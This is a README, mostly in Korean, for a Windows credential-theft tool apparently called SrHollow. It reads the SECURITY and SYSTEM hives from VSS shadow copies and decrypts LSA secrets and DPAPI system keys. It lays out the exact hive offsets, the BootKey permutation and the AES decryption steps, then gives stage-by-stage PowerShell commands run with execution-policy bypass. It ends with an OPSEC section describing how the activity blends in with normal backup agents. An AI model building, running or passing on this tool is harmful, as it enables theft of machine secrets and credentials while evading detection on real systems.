
기존 또는 새로 생성된 VSS 섀도 복사본을 통해 Windows 레지스트리 하이브에서 LSA 시크릿과 DPAPI 키를 추출하며, 인라인 regf 파서와 AES-256 복호화를 사용합니다.
LSA secrets 추출, 기존 VSS 섀도 복사본 재사용 + 인라인 regf 파서 + bcrypt.dll을 통한 AES-256 LSA 복호화.
\GLOBAL?? 열거 — NtOpenDirectoryObject + NtQueryDirectoryObject 사용. 가장 높은 번호의 HarddiskVolumeShadowCopyN을 선택.SrClient.dll의 SRSetRestorePointW(BEGIN_SYSTEM_CHANGE, DEVICE_DRIVER_INSTALL)로 폴백.SeBackupPrivilege 활성화 (AdjustTokenPrivileges).CreateFileW("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\{SECURITY,SYSTEM}", FILE_FLAG_BACKUP_SEMANTICS) 후 byte[]로 읽기.regf 워커가 하이브를 파싱: 기본 블록, 셀 타입 nk/vk/lf/lh/li/ri/db/sk. KeyNode 레이아웃, 플래그 @0x02, 서브키 리스트 @0x1C, 값 리스트 @0x28, 보안 키 @0x2C, 클래스 오프셋 @0x30, 이름 길이 u16 @0x48, 클래스 길이 u16 @0x4A (첫 시도에서 버그였음 — Microsoft 자체 문서가 여기서 모호함), 이름 @0x4C.ControlSet00N\Control\Lsa\{JD, Skew1, GBG, Data}의 Class UTF-16 hex를 연결 → 16 raw 바이트 → [8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7]로 순열.Policy\PolEKList\(default) (172 바이트)에서: salt = bytes[0x1C..0x3C]; tmpKey = SHA-256(BootKey || salt * 1000); pt = AES-256-CBC-decrypt(bytes[0x3C..], tmpKey, IV=0); LSA 키 = pt[68..100].Policy\Secrets\<name>\CurrVal\(default) 아래: 동일한 레이아웃, BootKey 대신 LSA 키로 salt-stretch.DPAPI_SYSTEM 본문: bytes[4..24] = MachineKey, bytes[24..44] = UserKey. 이들은 호스트의 모든 SYSTEM 범위 DPAPI 마스터 키를 복호화함.SrHollow/
├── README.md <- you are here
├── src/
│ └── SrHollow.cs <- inline regf parser + LSA AES crypto (~350 LOC, single file)
└── stages/
├── Stage1-Recon.ps1 <- read-only shadow enumeration
├── Stage1b-ReadShadowHives.ps1 <- auto-detect / auto-create shadow + slurp hives
├── Stage2-Decrypt.ps1 <- BootKey + LSA key + all secrets
└── Stage3-Report.ps1 <- formatted operator report with OPSEC footprint
src/SrHollow.cs는 System.Security.Cryptography(자체적으로 bcrypt.dll로 프록시됨) 외에 의존성이 전혀 없음. Add-Type 또는 csc.exe로 그대로 컴파일됨.
관리자 권한 PowerShell
# 1. Read-only recon, see what shadows already exist
powershell.exe -ep bypass -File .\stages\Stage1-Recon.ps1
# 2. Extract SECURITY + SYSTEM from the newest existing shadow
# (creates one via SRSetRestorePointW if none exist)
powershell.exe -ep bypass -File .\stages\Stage1b-ReadShadowHives.ps1
# 3. Derive BootKey + LSA key + decrypt every secret
powershell.exe -ep bypass -File .\stages\Stage2-Decrypt.ps1
# 4. (Optional) formatted operator report
powershell.exe -ep bypass -File .\stages\Stage3-Report.ps1
요구사항: 로컬 관리자(SeBackupPrivilege용), 실행 중이거나 시작 가능한 Volume Shadow Copy 서비스(Windows 10/11 기본값).
섀도가 이미 존재할 때 남는 귀속 가능 신호:
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\...에 대한 CreateFileW 한 번SeBackupPrivilege를 활성화하는 AdjustTokenPrivileges 한 번bcrypt.dll을 통한 표준 SHA-256 + AES-CBC (사용자 영역, 특이사항 없음)이는 대부분의 정상 백업 에이전트와 동일한 파일 열기 프로파일임.